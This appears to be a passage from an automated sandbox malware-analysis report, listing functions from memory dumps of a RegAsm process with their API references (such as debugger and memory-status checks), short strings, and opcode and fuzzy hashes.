Instruction Fuzzy Hash: 6F518030B401068FDF99DB78D890B6E77F7BBC8204F148469C40ADB399EA359D469B92

Function 06094831 Relevance: 2.6, Strings: 2, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPbq, xrefs: 06094991
fbq, xrefs: 0609486B

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: fbq$XPbq
API String ID: 0-2292610095
Opcode ID: 8c9884a031ba8bb7336390da9c9081b1df300ff3e60a11acf2431cea3996050a
Instruction ID: 68c16897700e3db30371453b562caf30a197917712ccc2463bec8156e1815f6f
Opcode Fuzzy Hash: 8c9884a031ba8bb7336390da9c9081b1df300ff3e60a11acf2431cea3996050a
Instruction Fuzzy Hash: D4514E30F002099FEB589FB4C454BAEBBF6FF88700F208529D505AB395DA758D029B91

Function 053ABF18 Relevance: 1.7, APIs: 1, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 053AC17E

Memory Dump Source

Source File: 00000004.00000002.4524311151.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_53a0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3b39dd28108a64298f78ac30eff9889d723197f3b4fe3ffd6b87d4025002c8a2
Instruction ID: 2116653316f79fffc46b99322a6567fbb19aa618a92d4afe903ada1cea6bde7f
Opcode Fuzzy Hash: 3b39dd28108a64298f78ac30eff9889d723197f3b4fe3ffd6b87d4025002c8a2
Instruction Fuzzy Hash: 14812371A00B458FD724DF29D454B6ABBF2FF88304F048A2DE48AD7A50DB75E949CB90

Function 00C7F160 Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4514338000.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c70000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 176ec36bdf1202d0bcc0ded353d67ac3d0bb7536263fb3ae927f6a1e4a5851ec
Instruction ID: 7f390275347321dba000d7464f2bbf2e80abd26fda64fd36ec1994278201cad0
Opcode Fuzzy Hash: 176ec36bdf1202d0bcc0ded353d67ac3d0bb7536263fb3ae927f6a1e4a5851ec
Instruction Fuzzy Hash: 5E412072E043868FCB14CFA9D4542AEBFB1EF89310F1585AAD458A7251DB389842CB90

Function 053AE104 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053AE222

Memory Dump Source

Source File: 00000004.00000002.4524311151.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_53a0000_RegAsm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e48b8acf4a1312f4798c8a3fe926e09f3079d7e9ce2fe6ed5aeebe765fb1a311
Instruction ID: e8cd6bd6b61e5218aef47c2c0b894df0bbc6f3c78ad8c041dfee32af754c75ae
Opcode Fuzzy Hash: e48b8acf4a1312f4798c8a3fe926e09f3079d7e9ce2fe6ed5aeebe765fb1a311
Instruction Fuzzy Hash: D551CFB1D003499FDB14CF99C884ADEBBB5FF48310F24852AE819AB210D775A885CF90

Function 053AE110 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053AE222

Memory Dump Source

Source File: 00000004.00000002.4524311151.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_53a0000_RegAsm.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 945a961bd4dea1d13b010ca0e3ab6e00ac2985b224e7a2f1c3afe52bfe2ac5cc
Instruction ID: 63079b5cc188d6c892819edb9f06043f343977b6ff9208de202054bce217d4e9
Opcode Fuzzy Hash: 945a961bd4dea1d13b010ca0e3ab6e00ac2985b224e7a2f1c3afe52bfe2ac5cc
Instruction Fuzzy Hash: EF41B1B1D00349DFDB14CF99C884ADEBBB5FF48310F24852AE419AB210D775A845CF90

Function 00C7706F Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00C770E7

Memory Dump Source

Source File: 00000004.00000002.4514338000.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c70000_RegAsm.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: deffd358eae4ce41d77b461d15c8fdc4a615c37a2bca233a5d25b0b5158b1b3f
Instruction ID: 818dfb57ec82be862a13ea91165a2c01871ee45b6980084675ca51c96d428b86
Opcode Fuzzy Hash: deffd358eae4ce41d77b461d15c8fdc4a615c37a2bca233a5d25b0b5158b1b3f
Instruction Fuzzy Hash: D92125B18052598FCB10CFAAD984BEEFBF4AF49310F14845AE459A3250C778A944CFA1

Function 00C7F248 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 00C7F2AF

Memory Dump Source

Source File: 00000004.00000002.4514338000.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c70000_RegAsm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 74670c9b158141f5d37ec746d5638541b1804b2df0cde296867eef740db2029f
Instruction ID: 1a758a0b238a7b666eeb5ae0346dd6f6fe5aad728446df3cfda1ce3a3cc343e6
Opcode Fuzzy Hash: 74670c9b158141f5d37ec746d5638541b1804b2df0cde296867eef740db2029f
Instruction Fuzzy Hash: 3711E2B5C0065A9BCB10DF9AC544BAEFBB4EF48720F15816AD818B7240D778A944CFE5

Function 053AC118 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 053AC17E

Memory Dump Source

Source File: 00000004.00000002.4524311151.00000000053A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_53a0000_RegAsm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9cdd481582d32b548a1cac7977a3db32b7d85638becc9dbf10d7592f52c4343e
Instruction ID: 380fc97e25df848f9d03deb7e2f8236a8cff09443aac2a05c03813194347467b
Opcode Fuzzy Hash: 9cdd481582d32b548a1cac7977a3db32b7d85638becc9dbf10d7592f52c4343e
Instruction Fuzzy Hash: 8311DFB6D046498FCB10CF9AD844A9EFBF4EB88624F14841AD419A7210C3B9A545CFA5

Function 0609DB8D Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0609DCE9

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: 0c4d42a67dda52961640cb7a85391945a25b29ff630808390a07ef699ac6e469
Instruction ID: c336b8bdafb2fcdb36f6d52df503e8cc216ff3e978fef74e57aa4ab492c6ed8e
Opcode Fuzzy Hash: 0c4d42a67dda52961640cb7a85391945a25b29ff630808390a07ef699ac6e469
Instruction Fuzzy Hash: 8941C270E9460A9FDF549F64D89069EBFF3FF85300F104929D401DB280EBB49946DBA1

Function 060922A5 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

PH]q, xrefs: 060923F3

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: 4f688e2aefef5c6d4025b4b8a0a6c0aae523f986873229565a2305062651131b
Instruction ID: 0c073964c814b1db5d12cb4b0218889f3bc3860df80fec09938602089d1dfcb7
Opcode Fuzzy Hash: 4f688e2aefef5c6d4025b4b8a0a6c0aae523f986873229565a2305062651131b
Instruction Fuzzy Hash: AA310030B24205AFDF499B34C56466E7BE7AF85200F108878D402DB395DE38CE46DBA1

Function 060922B8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH]q, xrefs: 060923F3

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: 94cd6bf1b134fc01edb74ce741492393868a49aebfbe083ced6e7586b33eb48c
Instruction ID: f3e9ce9e376cceaa884ba234335a0bfe96f1b4087a33027a449762b595b63c01
Opcode Fuzzy Hash: 94cd6bf1b134fc01edb74ce741492393868a49aebfbe083ced6e7586b33eb48c
Instruction Fuzzy Hash: CA311030B20205AFDF889B74C55066F7BE7AF88200B108428D406DB384DE38CE46DBA1

Function 0609FED8 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

|, xrefs: 0609FF38

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 64b48335734c57463a3f74ba54bc3ea57f0988ecbf504daa6ca90d4755972c03
Instruction ID: b13d8ba39ddb5feeeb4235ef325a07f6e4eaa9afbf1aecc3d3320e395e549ab0
Opcode Fuzzy Hash: 64b48335734c57463a3f74ba54bc3ea57f0988ecbf504daa6ca90d4755972c03
Instruction Fuzzy Hash: 0011DC71B40251CFDB549B788814BAD7BF2EF4C704F1485A9E55ADB3A0EB799D02CB40

Function 0609FEE8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 0609FF38

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: be01825b12638a36a1000ff726fcaae8b245b463e6c7c27e4fd3abe9fb221fd5
Instruction ID: 52cf1ef1d3e453cfccd6a20580a798c8be89277752a1876a2915d192b0ba8ff9
Opcode Fuzzy Hash: be01825b12638a36a1000ff726fcaae8b245b463e6c7c27e4fd3abe9fb221fd5
Instruction Fuzzy Hash: 69114C70F402159FDB449B789814B6D7BF5AF4C604F108469E50AD73A0EA759D01DB90

Function 06094729 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

\Obq, xrefs: 06094735

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID: \Obq
API String ID: 0-2878401908
Opcode ID: e63dbd5938165f91c25d4ce56dbb7b97ce48cfcf784722c77efa06a6f41012a4
Instruction ID: 05a25bcc8c689928a43ebc8790a912cc69a3d2a2b74066551e6ef45d185ece34
Opcode Fuzzy Hash: e63dbd5938165f91c25d4ce56dbb7b97ce48cfcf784722c77efa06a6f41012a4
Instruction Fuzzy Hash: 31F0DA30A60119EFDB54DF94E859BAEBBB6FF88705F204119E402A7294CBB41D42DB90

Function 06092430 Relevance: 1.0, Instructions: 1000COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34ff021f79a368ab22cd2979eb1ac759cf5884b8f7527fe670ed309e4a6c3e21
Instruction ID: ebf31586d246e6728c9720d6ebc8dc7a274b1cc0d0a102bdcbf9b40187384b12
Opcode Fuzzy Hash: 34ff021f79a368ab22cd2979eb1ac759cf5884b8f7527fe670ed309e4a6c3e21
Instruction Fuzzy Hash: C7927634A102049FDBA8DB68C584A9DBBF3FB49314F5484A9D409EB361DB35ED85CFA0

Function 06096AF0 Relevance: .5, Instructions: 495COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb6129759252803a803015b2693d190d1a6ff6900729c62777da2c45657fdae
Instruction ID: 79fddc04314862440ef730e9b312df1cf283ff618503879325fa755524547f5f
Opcode Fuzzy Hash: 2cb6129759252803a803015b2693d190d1a6ff6900729c62777da2c45657fdae
Instruction Fuzzy Hash: 8C028A31A102048FDF98DB68D954BADBBF3EB85314F148469E41A9B351DB36EC46CBA0

Function 06095EB8 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c84524df1103776978c2d059666b907f226f399bc11abcff3326f01b2882c08
Instruction ID: 3a0d825121996275979e1daeb1a06eebbce19f8d87bebf68c29b2b443818d83b
Opcode Fuzzy Hash: 4c84524df1103776978c2d059666b907f226f399bc11abcff3326f01b2882c08
Instruction Fuzzy Hash: CC61D071F400114FDF559A6ACC9066FBADBAFD4224F144039E80EDB360EE6ADD0287E1

Function 06093F70 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00402cdb6f26a1a73802594bce3b5bbe583e77eb47eb750dd188addbabb5c8ac
Instruction ID: 013f62091b7bc52d449bc1c39e0af0042c91683cf8d6fe52729b109efea08759
Opcode Fuzzy Hash: 00402cdb6f26a1a73802594bce3b5bbe583e77eb47eb750dd188addbabb5c8ac
Instruction Fuzzy Hash: D1814D30B4060A8BDF98DFB4D45479EBBF7AB89304F108529D40ADB398EB75DC468B91

Function 06094290 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccfb82959e25eeb17455eb570662fa8261ac009b688da9ec274b562ab5c18b65
Instruction ID: 71524941a24893ffd2dd0e46d9008429a23aae45bdec0ab143cebd980512d5d3
Opcode Fuzzy Hash: ccfb82959e25eeb17455eb570662fa8261ac009b688da9ec274b562ab5c18b65
Instruction Fuzzy Hash: 7A912D30E102198FDF64DF68C890B9DBBB1FF89304F208599D54DAB255DB70AA86CF51

Function 060942A8 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4db3d5778276e45256e61e7a3dce98f82a2ffd7cffc22eb634fc26adf6ff2a5
Instruction ID: f8798c65377f5e71c9b32849b9b36d98cc9da88f39fe29d5753cf5185cbee315
Opcode Fuzzy Hash: d4db3d5778276e45256e61e7a3dce98f82a2ffd7cffc22eb634fc26adf6ff2a5
Instruction Fuzzy Hash: 3B912E30E102198BDF64DF68C890B9DB7B1FF89304F208599D54DAB255DB70AA86CF51

Function 0609EBE0 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f847b4a29ad7b4526f345305687d08ef28e94c8846a82526f77bbc52359e92e6
Instruction ID: d64ca001c76081495caf08f35b6d14d680bcde88ec225de5e824b49d0f6fb071
Opcode Fuzzy Hash: f847b4a29ad7b4526f345305687d08ef28e94c8846a82526f77bbc52359e92e6
Instruction Fuzzy Hash: 87714B70A402099FDB54DFA8D990A9DBBF6FF88304F24C529E459AB355DB30EC46CB50

Function 0609EBF0 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7d41de0dfee0be6a550166fc242711872d6b6a6b12aa02631d5a228fc35770e
Instruction ID: 904ea1014f4a12157c6d309377f7233f91ef383fc5085233cde41dea2e791b80
Opcode Fuzzy Hash: e7d41de0dfee0be6a550166fc242711872d6b6a6b12aa02631d5a228fc35770e
Instruction Fuzzy Hash: FC712A70A002099FDB54DFA8D990A9DBBF6FF88304F14C529E419AB355DB30ED46CB60

Function 0609FC78 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7fd251e547ebfdbe8a916d7cdcde593c68f7bf07380fab8a09bc202b465887f
Instruction ID: af42e47d2eb04770e05b0c7145370350c87d7f6fcf18525550731184666ef953
Opcode Fuzzy Hash: d7fd251e547ebfdbe8a916d7cdcde593c68f7bf07380fab8a09bc202b465887f
Instruction Fuzzy Hash: BA51F031E41106CFDF54AFB8E4546ADBBB3FB84315F208829E10AD7361EB358855DB91

Function 0609F622 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aaf2c15075d0c51af1f47e5508107ef758f44b5c11c6e910ea10c64955fe5ff
Instruction ID: b50b0cea709783919b576b5dcf60df54de478a78c61755f9c4cfc10833a5746d
Opcode Fuzzy Hash: 8aaf2c15075d0c51af1f47e5508107ef758f44b5c11c6e910ea10c64955fe5ff
Instruction Fuzzy Hash: CA510A70B502055FEFE4566CD854B6F2FAFDB89300F20482AE50AC73A5DA6CCC05D3A2

Function 0609F630 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6899fa803b581a703779ebc37dc1feaa37acc366eafad864b01798f86d4c28e
Instruction ID: f6d3f4f2414660de4c0fb88ed223f97702db7ca6ece5e706efa7e37330ceef3e
Opcode Fuzzy Hash: f6899fa803b581a703779ebc37dc1feaa37acc366eafad864b01798f86d4c28e
Instruction Fuzzy Hash: 2751FB70B502055FEFE4566CE954B2F6AAFDB89314F204829E50EC33A5DE6CCC45D3A2

Function 060950E8 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cee98127a000503d8083ff3b5dee61bb98cf70e4109c5690d40bd5dd9bc4b84
Instruction ID: 4d925e6a91e6ad6aa131a580ffb39e9c75a14bdd3a8bbc84641b8389be20087c
Opcode Fuzzy Hash: 6cee98127a000503d8083ff3b5dee61bb98cf70e4109c5690d40bd5dd9bc4b84
Instruction Fuzzy Hash: 99416D71E406098FDFB2CFAADC806AEFBF2FB95310F10492AD255D7250D730A8459BA1

Function 06092168 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd3228e746051fb5edf020604b34d12ef0b91eb452290d9c33f3ffc5cc50a644
Instruction ID: 04d6ee4b79d0357bf976f5c220a45727fa428fcddbea6c341721f6eb7299d0d8
Opcode Fuzzy Hash: cd3228e746051fb5edf020604b34d12ef0b91eb452290d9c33f3ffc5cc50a644
Instruction Fuzzy Hash: 81317E34E24205ABDF59DFA4D49469EBBF2EF89300F10C929E816E7350DB70AD46CB50

Function 06092178 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aae7d68621ea223495b389ec85c4a5567bd1cfb82b88e2a6e37b85cc6d3d9f12
Instruction ID: ea1ff84a2f70a4ff7eec3748a29b1fa8c16f5ec0fe4926a6d09590dc8b364bba
Opcode Fuzzy Hash: aae7d68621ea223495b389ec85c4a5567bd1cfb82b88e2a6e37b85cc6d3d9f12
Instruction Fuzzy Hash: 51314D34E20205ABDF59DFA4D854A9EBBF2EF89300F10C529E816E7350DB71AD46CB50

Function 06093B79 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e135ec6b5a8e72bb1b83569666f2a789ca7d5cdaf645dac71d6fb5c2f15c5767
Instruction ID: dde1fc4610363c47be93226566937325cbc8721ed705ef91e121f4bc3427e394
Opcode Fuzzy Hash: e135ec6b5a8e72bb1b83569666f2a789ca7d5cdaf645dac71d6fb5c2f15c5767
Instruction Fuzzy Hash: E2219F71F01A159FDB88DF78D880AEEBBF5EB48710F108065E905E7351E739D9428BA1

Function 06093B88 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b801b1be6b8206ea9b885f7c4f9410e63638e4fcd552ece7d99bfd9c8cd6a986
Instruction ID: 2fefcc1efcc87d635772f80dd7d18e79a4028d5080d8ef9d45dcb56732e29974
Opcode Fuzzy Hash: b801b1be6b8206ea9b885f7c4f9410e63638e4fcd552ece7d99bfd9c8cd6a986
Instruction Fuzzy Hash: 3C21BA71E01A159FDF88DF78D880AAEBBF6AB88310F108029E905E7350E735D9018FA1

Function 06096DD8 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246bd49206a2dbeddb2c170fa615f93edb46abddbe619d72e14df049b0f636a6
Instruction ID: ad3cf39df052783645738ab30c12b910f38eb2a7b99dd05bddbff1f79bbe92b5
Opcode Fuzzy Hash: 246bd49206a2dbeddb2c170fa615f93edb46abddbe619d72e14df049b0f636a6
Instruction Fuzzy Hash: 4821AE31B600099FDF88DA68E9507ADBBF7EB85314F108425D409EB344EA359D42CB90

Function 0095D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4512941636.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_95d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e13d0e657024fc09e9be6e6009d2d3cea43ef78b59d24c1c0f1e126d27a2820
Instruction ID: b38a881e8946dd16b951c25531e1bc0fb1119f4159b2a68191455d37fc0746a3
Opcode Fuzzy Hash: 5e13d0e657024fc09e9be6e6009d2d3cea43ef78b59d24c1c0f1e126d27a2820
Instruction Fuzzy Hash: 8521F271604244DFDB24DF24D9C4B26BF69EB84315F24C969DD094B396C33AD84BCB62

Function 06096DE8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97f975fe6384b1336ccbb6d6ae8caafb74bc8c4a51084141e099195198880354
Instruction ID: 75d7ed947fa8e1e25480f1a2176011cc39ce5863335f4bc5ac7b5d9e6961f9cf
Opcode Fuzzy Hash: 97f975fe6384b1336ccbb6d6ae8caafb74bc8c4a51084141e099195198880354
Instruction Fuzzy Hash: F321A231B200189FDF88DA69E950BAEBBF7EB85314F148435E409E7345EB31EC418B91

Function 0609A3E0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c137ea2943100b09319d07b563c48970bacf71b2bef088a8fff2875a45ce434b
Instruction ID: 32e0ded855e017a7658210f440a03cab4988bcec002b13f413f3ccd87cc96ea1
Opcode Fuzzy Hash: c137ea2943100b09319d07b563c48970bacf71b2bef088a8fff2875a45ce434b
Instruction Fuzzy Hash: 771126307011414FDF9A967CD898B5A3FE6DBCB214F118179F04AC7365DE28CE0297A2

Function 0095D005 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4512941636.000000000095D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0095D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_95d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57052c4eadc49fd1bfc7e219d973ef4e947d22164b945cc4d7b7361886973b42
Instruction ID: 14044c7c8c6e9e2760fc37853861e4a725257bd62d6231203cf380a503fd3a90
Opcode Fuzzy Hash: 57052c4eadc49fd1bfc7e219d973ef4e947d22164b945cc4d7b7361886973b42
Instruction Fuzzy Hash: D121A1755093C08FDB12CF20D994B15BF71EB46314F28C5EAD8498B6A7C33A980ACB62

Function 06093C98 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4528970163.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6090000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96b985c61ab27a49897608c3d69a1f0edf274f615a9e3583a75352c912115b9c
Instruction ID: 9094802156e773e3828f4e12edbf02ec4e51a96539d6717103929741c89d6a22
